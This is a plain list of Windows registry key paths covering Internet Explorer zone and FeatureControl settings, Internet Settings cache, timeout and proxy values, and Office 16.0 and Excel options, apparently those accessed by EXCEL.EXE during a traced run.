HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Microsoft\OfficeSoftwareProtectionPlatform
HKEY_LOCAL_MACHINE\Software\Microsoft\OfficeSoftwareProtectionPlatform\Path
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\Policies\0ff1ce15-a989-479d-af46-f275c6370663
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\Policies\0ff1ce15-a989-479d-af46-f275c6370663\Value
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Viewer
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LicenseAggregateSubscription
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\DisabledCmdBarItemsList
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\DisabledCmdBarItemsCheckBoxes
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\DisabledShortcutKeysList
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\DisabledShortcutKeysCheckBoxes
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ConvertDocument
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\AttemptDisabledActionMessage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\TasRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdForApp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdForApp\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SplashScreenLicense
HKEY_CLASSES_ROOT\Outlook.Application
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableRobustifiedUNC
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Font
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\MemoryLevelOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UndoHistory
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargePivotTables
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoRowThousandCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargeDataModels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoDataModelSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PreferExcelDataModel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableIdleMemoryFlush
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableEDPIsIdentityManagedGate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableMergeInstance
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ShipAsserts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpandedLines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpanded
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NameBoxWidth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\3dDialogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MsoTbCust
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CmdBarData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\BtnSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Tooltips
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\EnablePaneManagement
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Settings
